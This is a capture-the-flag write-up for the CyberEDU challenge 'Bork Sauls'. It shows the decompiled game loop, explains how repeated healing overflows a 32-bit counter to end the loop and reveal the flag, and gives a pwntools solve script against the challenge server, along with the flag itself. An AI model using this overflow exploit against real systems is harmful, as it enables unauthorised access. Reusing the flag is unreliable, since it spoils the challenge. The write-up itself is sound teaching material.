Bork Sauls - CyberEDU
Bork Sauls - CyberEDU
Flag : ctf{d8194ce78a6c555adae9c14fe56674e97ba1afd88609c99dcb95fc599dcbc9f5}
- Difficulty: Easy
Firstly, I decompiled the file to see what is inside.
/* Decompiled main() of the challenge binary (decompiler output, so the local
   names are auto-generated). local_c is the value printed as "Health",
   local_10 counts how often option 1 or 2 was chosen, and local_14 receives
   the menu choice read by scanf. */
undefined8 main(EVP_PKEY_CTX *param_1)
{
int local_14;
int local_10;
/* Declared unsigned, but the loop condition at the bottom reads it as a
   signed int. */
uint local_c;
init(param_1);
local_c = 100000;
local_10 = 0;
puts("You enter the room, and you meet the Dancer of the Boreal Valley. You have 3 options.");
do {
puts("Choose: \n1.Roll\n2.Hit(only 3 times)\n3.Throw Estus flask at the boss (wut?)\n4.Alt-F4\n"
);
/* The scanf return value is not checked. The format string DAT_001020b5 is
   not shown in this listing (presumably "%d" -- confirm in the binary). */
__isoc99_scanf(&DAT_001020b5,&local_14);
if (local_14 == 3) {
/* No upper bound: each choice of 3 adds 1999999, so repeated additions can
   carry the 32-bit value past 0x7fffffff.
   NOTE(review): a range check or saturating add here would remove the
   wraparound that the loop condition below depends on. */
local_c = local_c + 1999999;
}
else if (local_14 < 4) {
/* Choices 1 and 2 share this path; zero and negative input fall through
   without changing anything. */
if (0 < local_14) {
/* Only the first three such choices subtract, so at most 90000 is ever
   removed from the initial 100000. */
if (local_10 < 3) {
local_c = local_c - 30000;
}
local_10 = local_10 + 1;
}
}
else if (local_14 == 4) {
/* WARNING: Subroutine does not return */
exit(0);
}
printf("Health: %d\n",(ulong)local_c);
/* Repeats while the value, viewed as a signed int, is >= 0. Subtraction alone
   cannot make it negative (see the cap above), so apart from exit(0) the loop
   only ends once the additions wrap into the range where the signed view is
   negative. */
} while (-1 < (int)local_c);
/* Reached only after the loop has ended. */
printf("Congratulations. Here\'s your flag: ");
system("cat flag.txt");
return 0;
}
I understand what I need to do :
if(-1 > (int)local_c);
Once `(int)local_c` is negative, the `do … while` loop ends and execution continues to the instruction that runs `cat flag.txt`.
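OK, but in normal play this looks impossible: the health only ever drops by 30000, and only three times. Hmm, INT_MAX = 2147483647, but what happens if you increment “INT_MAX”? => INT_MIN = -INT_MAX = -2147483647, which is negative => GG. (Strictly, INT_MIN is -2147483648, one below -INT_MAX. Here the counter is stored as a `uint` and only cast to `int` in the loop condition, so any value that the repeated +1999999 pushes past INT_MAX reads as negative, which is all the check needs.)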
Solve script:
from pwn import *
# Verbose logging: show every prompt and reply exchanged with the service.
context.log_level = "debug"

io = remote("34.159.73.134", 30149)
# io = process("./bork_sauls")  # alternative: run a local copy of the binary

INT_MAX = 2147483647  # largest value of a 32-bit signed int (C/C++)
HEAL_STEP = 1999999  # what menu option 3 adds to the health counter

# Keep a local mirror of the service's counter. It starts at 100000 and grows
# by HEAL_STEP per round; once the mirror has passed INT_MAX, the service's
# 32-bit value reads as negative when cast to int, which ends its loop.
mirrored_health = 100000
while True:
    if mirrored_health >= INT_MAX:
        break
    mirrored_health += HEAL_STEP
    io.recvuntil(b"4.Alt-F4")  # wait until the whole menu has been printed
    io.sendline(b"3")

# After its loop ends the service prints this banner followed by the flag.
io.recvuntil(b"Here's your flag: ")
print(io.recvline().strip().decode())
This post is licensed under CC BY 4.0 by the author.